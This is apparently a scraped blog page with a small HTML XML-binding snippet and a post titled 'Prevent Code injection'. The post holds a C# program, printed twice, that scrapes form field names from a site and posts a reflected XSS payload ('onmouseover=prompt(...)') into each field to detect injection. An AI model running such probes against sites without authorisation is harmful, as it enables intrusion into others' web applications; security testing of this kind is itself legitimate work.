< HTML >
< HEAD >
< TITLE >Show XML Content< / TITLE >
< / HEAD >
< BODY >
< XML ID="MyXMLdata" Name="xmlData" SRC="file.xml" >< / XML >
< TABLE ID="XMLTable" DATASRC="#MyXMLdata" BORDER="1" cellpadding="2" cellspacing="0" >
< THEAD >
< TH >column 1< / TH >
< TH >Column 2< / TH >
< / THEAD >
< TR >
< TD >
< B >< Span DATAFLD="ID" >< / SPAN >< / B >
< / TD >
< TD >
< SPAN DATAFLD="TRNREF" >< / SPAN >
< / TD >
< / TR >
< / TABLE >
< / BODY >
< / HTML >
Monday, November 21, 2011
Wednesday, November 16, 2011
Prevent Code injection
using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Net;
using System.Net.Sockets;
namespace sqlInjection
{
class Program
{
private static string proxy = "";
private static string port = "";
private static string user = @"";
private static string pass = "";
private static void SearchComponents(string htmlContent, string component, List httpControls)
{
bool finish = false;
int positionComponent = 0;
int positionName = 0;
int positionCurrent = 0;
int position = 0;
int positionEqual = 0;
bool beginName = false;
string finishCharacter = " ";
while (finish != true)
{
positionComponent = htmlContent.IndexOf(component,positionCurrent);
if (positionComponent > 0)
{
positionCurrent = positionComponent + 3;
positionName = htmlContent.IndexOf("name", positionCurrent);
position = positionName + 4;
string componentName = "";
bool finishName = false;
finishCharacter = " ";
positionEqual = 0;
beginName = false;
while (!finishName)
{
if (positionEqual == 0)
{
if (htmlContent.Substring(position, 1) == "=")
{
positionEqual = 1;
}
}
else
{
if (beginName == false)
{
if (htmlContent.Substring(position, 1) == " " || htmlContent.Substring(position, 1) == "'" || htmlContent.Substring(position, 1) == "\"")
{
beginName = false;
}
else
{
beginName = true;
componentName = htmlContent.Substring(position, 1);
}
}
else
{
if (htmlContent.Substring(position, 1) == " " || htmlContent.Substring(position, 1) == "'" || htmlContent.Substring(position, 1) == "\"")
{
finishName = true;
}
else
componentName += htmlContent.Substring(position, 1);
}
}
position++;
}
httpControls.Add(componentName);
//httpControls.Add(httmlContent.Substring(componentName, 30));
}
else
{
finish = true;
}
}
}
static void Main(string[] args)
{
string link = "http://site.com";
/*
string injection = "1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e";
string injectionVerif = "prompt(";
*/
string injection = @"%22onmouseover=prompt(963103)%3E";
string injectionVerif = "onmouseover=prompt(";
WebRequest request = WebRequest.Create(link);
request.Method = "POST";
request.Proxy = new WebProxy(proxy, int.Parse(port));
request.Proxy.Credentials = new NetworkCredential(user,pass);
string postData = "";
byte[] byteArray = Encoding.UTF8.GetBytes(postData);
request.ContentType = "application/x-www-form-urlencoded";
request.ContentLength = byteArray.Length;
Stream dataStream = request.GetRequestStream();
dataStream.Write(byteArray, 0, byteArray.Length);
dataStream.Close();
WebResponse response = request.GetResponse();
Console.WriteLine(((HttpWebResponse)response).StatusDescription);
dataStream = response.GetResponseStream();
StreamReader reader = new StreamReader(dataStream);
string httmlContent = reader.ReadToEnd();
reader.Close();
dataStream.Close();
response.Close();
string searchComponent = "";
List listHTMLComponents = new List();
listHTMLComponents.Add("< select"); listHTMLComponents.Add("< input"); List httpControls = new List();
for (int i = 0; i < listHTMLComponents.Count; i++)
{
searchComponent = listHTMLComponents[i].ToString();
SearchComponents(httmlContent, searchComponent, httpControls);
}
for (int i = 0; i < httpControls.Count; i++)
{
postData += httpControls[i] + "=" + injection + "&";
}
request = WebRequest.Create(link);
request.Method = "POST";
byteArray = Encoding.UTF8.GetBytes(postData);
request.ContentType = "application/x-www-form-urlencoded";
request.ContentLength = byteArray.Length;
request.Proxy = new WebProxy(proxy, int.Parse(port));
request.Proxy.Credentials = new NetworkCredential(user,pass);
dataStream = request.GetRequestStream();
dataStream.Write(byteArray, 0, byteArray.Length);
dataStream.Close();
response = request.GetResponse();
dataStream = response.GetResponseStream();
reader = new StreamReader(dataStream);
httmlContent = reader.ReadToEnd();
reader.Close();
dataStream.Close();
response.Close();
if (httmlContent.Contains(injectionVerif))
{
Console.WriteLine("Injection ");
}
}
}
}
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Net;
using System.Net.Sockets;
namespace sqlInjection
{
class Program
{
private static string proxy = "";
private static string port = "";
private static string user = @"";
private static string pass = "";
private static void SearchComponents(string htmlContent, string component, List
{
bool finish = false;
int positionComponent = 0;
int positionName = 0;
int positionCurrent = 0;
int position = 0;
int positionEqual = 0;
bool beginName = false;
string finishCharacter = " ";
while (finish != true)
{
positionComponent = htmlContent.IndexOf(component,positionCurrent);
if (positionComponent > 0)
{
positionCurrent = positionComponent + 3;
positionName = htmlContent.IndexOf("name", positionCurrent);
position = positionName + 4;
string componentName = "";
bool finishName = false;
finishCharacter = " ";
positionEqual = 0;
beginName = false;
while (!finishName)
{
if (positionEqual == 0)
{
if (htmlContent.Substring(position, 1) == "=")
{
positionEqual = 1;
}
}
else
{
if (beginName == false)
{
if (htmlContent.Substring(position, 1) == " " || htmlContent.Substring(position, 1) == "'" || htmlContent.Substring(position, 1) == "\"")
{
beginName = false;
}
else
{
beginName = true;
componentName = htmlContent.Substring(position, 1);
}
}
else
{
if (htmlContent.Substring(position, 1) == " " || htmlContent.Substring(position, 1) == "'" || htmlContent.Substring(position, 1) == "\"")
{
finishName = true;
}
else
componentName += htmlContent.Substring(position, 1);
}
}
position++;
}
httpControls.Add(componentName);
//httpControls.Add(httmlContent.Substring(componentName, 30));
}
else
{
finish = true;
}
}
}
static void Main(string[] args)
{
string link = "http://site.com";
/*
string injection = "1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e";
string injectionVerif = "prompt(";
*/
string injection = @"%22onmouseover=prompt(963103)%3E";
string injectionVerif = "onmouseover=prompt(";
WebRequest request = WebRequest.Create(link);
request.Method = "POST";
request.Proxy = new WebProxy(proxy, int.Parse(port));
request.Proxy.Credentials = new NetworkCredential(user,pass);
string postData = "";
byte[] byteArray = Encoding.UTF8.GetBytes(postData);
request.ContentType = "application/x-www-form-urlencoded";
request.ContentLength = byteArray.Length;
Stream dataStream = request.GetRequestStream();
dataStream.Write(byteArray, 0, byteArray.Length);
dataStream.Close();
WebResponse response = request.GetResponse();
Console.WriteLine(((HttpWebResponse)response).StatusDescription);
dataStream = response.GetResponseStream();
StreamReader reader = new StreamReader(dataStream);
string httmlContent = reader.ReadToEnd();
reader.Close();
dataStream.Close();
response.Close();
string searchComponent = "";
List
listHTMLComponents.Add("< select"); listHTMLComponents.Add("< input"); List
for (int i = 0; i < listHTMLComponents.Count; i++)
{
searchComponent = listHTMLComponents[i].ToString();
SearchComponents(httmlContent, searchComponent, httpControls);
}
for (int i = 0; i < httpControls.Count; i++)
{
postData += httpControls[i] + "=" + injection + "&";
}
request = WebRequest.Create(link);
request.Method = "POST";
byteArray = Encoding.UTF8.GetBytes(postData);
request.ContentType = "application/x-www-form-urlencoded";
request.ContentLength = byteArray.Length;
request.Proxy = new WebProxy(proxy, int.Parse(port));
request.Proxy.Credentials = new NetworkCredential(user,pass);
dataStream = request.GetRequestStream();
dataStream.Write(byteArray, 0, byteArray.Length);
dataStream.Close();
response = request.GetResponse();
dataStream = response.GetResponseStream();
reader = new StreamReader(dataStream);
httmlContent = reader.ReadToEnd();
reader.Close();
dataStream.Close();
response.Close();
if (httmlContent.Contains(injectionVerif))
{
Console.WriteLine("Injection ");
}
}
}
}
Subscribe to:
Posts (Atom)